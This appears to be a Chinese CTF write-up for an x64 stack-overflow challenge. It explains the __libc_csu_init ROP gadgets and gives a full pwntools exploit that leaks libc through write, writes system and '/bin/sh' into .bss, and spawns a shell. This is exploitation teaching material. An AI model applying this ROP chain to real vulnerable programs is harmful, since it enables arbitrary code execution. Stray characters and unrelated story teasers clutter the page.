通用gadget_libc_csu_init的使用

蒸米 棧溢出的x64位 level5 wp

_libc_csu_init函數(shù)是程序調(diào)用libc庫用來對程序進(jìn)行初始化的函數(shù)赠群,一般先于main函數(shù)執(zhí)行
而我們則是要利用_libc_csu_init其中兩端特殊的gadget

image.png

gadget 位于 0x400600 和 0x40061a地址
先借用0x40061a 處的gadget 將想要壓入寄存器的參數(shù)壓入
順序依次 rbx rbp r12 r13 r14 r15 特別是rbx=0 rbp=1 r12=target_function
然后再調(diào)用 0x400600處的gadget將 r13 r14 r15 的值和rdx rsi edi交換

這個通用gadget中還隱藏著兩個常用的gadget,我們可以通過錯位碼來得到它


image.png
image.png

通過 0x400621和0x400623獲得了pop rsi _r15 和pop_rdi兩個gadget 脸甘,就可以輕松調(diào)用兩個參數(shù)的函數(shù)了

payload:

payload = junk + p64(0x40061a) + p64(rbx)+ p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload +=p64(0x400600) # mov r13 rdx;mov r14 rsi ; mov r15 edi;
payload +='a'*0x38  
#填充0x38個字符 控制rsp指向我們想要返回的函數(shù)地址
>payload +=p64(return_add)

解題思路

  1. 利用write函數(shù)泄露出libc內(nèi)存空間的信息
  2. 通過泄露的信息獲得execve函數(shù)的地址
  3. 將execve函數(shù)的地址和參數(shù)"/bin/sh\x00"一起寫入bss section中
  4. 通過gadget 的call (r12,rbp,8) 調(diào)用execve函數(shù)

exp:

from pwn import*  
  
p = process('./leve52')  
elf = ELF('./leve52')  
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  
  
write_got = elf.got['write']  
write_plt = elf.symbols['write']  
read_got = elf.got['read']  
read_plt = elf.symbols['read']  
bss = elf.bss()  
start = 0x40061a  
end = 0x400600  
main = elf.symbols['main']  
  
junk = 'a'*(0x80+8)  
fakeebp = 'a'*8  
  
def csu(rbx, rbp, r12, r13, r14, r15, last):  
    # pop rbx,rbp,r12,r13,r14,r15  
    # rbx should be 0,  
    # rbp should be 1,enable not to jump  
    # r12 should be the function we want to call  
    # rdi=edi=r15d  
    # rsi=r14  
    # rdx=r13  
    payload = 'a' * 0x80 + fakeebp  
    payload += p64(start) + p64(rbx) + p64(rbp) + p64(r12) + p64(  
        r13) + p64(r14) + p64(r15)  
    payload += p64(end)  
    payload += 'a' * 0x38  
    payload += p64(last)  
    p.send(payload)  
    sleep(1)  
  
print "*************leak write_add**********"  
write_lib = libc.symbols['write']  
print "write_lib --> [%s] "%write_lib  
  
p.recvuntil("Hello, World\n")  
csu(0,1,write_got,8,write_got,1,main)  
  
write_add = u64(p.recv(8))  
print "write_add --> [%s]" %hex(write_add)  
  
lib_base = write_add - write_lib  
print "libc base --> [%s]" %hex(lib_base)  
system_add = lib_base + libc.symbols['system'] # system can not work up  
print "system_add --> [%s]" %hex(system_add)  
  
  
print "************write address and \'\bin\sh'\'***************"  
payload = junk + p64(start) + p64(0) + p64(1) + p64(read_got) + p64(16) + p64(bss) + p64(0)  
payload += p64(end)  
payload += 'a'*0x38  
payload +=p64(main)  
  
  
p.recvuntil('Hello, World\n')  
p.send(payload)  
p.send(p64(system_add)+'/bin/sh\x00')  
  
  
payload = junk + p64(start)  
payload += p64(0) + p64(1) + p64(bss) + p64(0) + p64(0) + p64(bss+8)  
payload += p64(end)  
payload += 'a'*0x38  
payload +=p64(main)  
p.recvuntil('Hello, World\n')  
p.send(payload)  
  
p.interactive()  

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末履肃,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子扣蜻,更是在濱河造成了極大的恐慌逆巍,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,734評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件莽使,死亡現(xiàn)場離奇詭異锐极,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)芳肌,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評論 3 394
  • 文/潘曉璐 我一進(jìn)店門灵再,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人亿笤,你說我怎么就攤上這事翎迁。” “怎么了净薛?”我有些...
    開封第一講書人閱讀 164,133評論 0 354
  • 文/不壞的土叔 我叫張陵汪榔,是天一觀的道長。 經(jīng)常有香客問我肃拜,道長痴腌,這世上最難降的妖魔是什么雌团? 我笑而不...
    開封第一講書人閱讀 58,532評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮士聪,結(jié)果婚禮上辱姨,老公的妹妹穿的比我還像新娘。我一直安慰自己戚嗅,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,585評論 6 392
  • 文/花漫 我一把揭開白布枢舶。 她就那樣靜靜地躺著懦胞,像睡著了一般。 火紅的嫁衣襯著肌膚如雪凉泄。 梳的紋絲不亂的頭發(fā)上躏尉,一...
    開封第一講書人閱讀 51,462評論 1 302
  • 那天,我揣著相機(jī)與錄音后众,去河邊找鬼胀糜。 笑死,一個胖子當(dāng)著我的面吹牛蒂誉,可吹牛的內(nèi)容都是我干的教藻。 我是一名探鬼主播,決...
    沈念sama閱讀 40,262評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼右锨,長吁一口氣:“原來是場噩夢啊……” “哼括堤!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起绍移,我...
    開封第一講書人閱讀 39,153評論 0 276
  • 序言:老撾萬榮一對情侶失蹤悄窃,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后蹂窖,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體轧抗,經(jīng)...
    沈念sama閱讀 45,587評論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,792評論 3 336
  • 正文 我和宋清朗相戀三年瞬测,在試婚紗的時候發(fā)現(xiàn)自己被綠了横媚。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,919評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡涣楷,死狀恐怖分唾,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情狮斗,我是刑警寧澤绽乔,帶...
    沈念sama閱讀 35,635評論 5 345
  • 正文 年R本政府宣布,位于F島的核電站碳褒,受9級特大地震影響折砸,放射性物質(zhì)發(fā)生泄漏看疗。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,237評論 3 329
  • 文/蒙蒙 一睦授、第九天 我趴在偏房一處隱蔽的房頂上張望两芳。 院中可真熱鬧,春花似錦去枷、人聲如沸怖辆。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽竖螃。三九已至,卻和暖如春逗余,著一層夾襖步出監(jiān)牢的瞬間特咆,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評論 1 269
  • 我被黑心中介騙來泰國打工录粱, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留腻格,地道東北人。 一個月前我還...
    沈念sama閱讀 48,048評論 3 370
  • 正文 我出身青樓啥繁,卻偏偏與公主長得像菜职,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子旗闽,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,864評論 2 354

推薦閱讀更多精彩內(nèi)容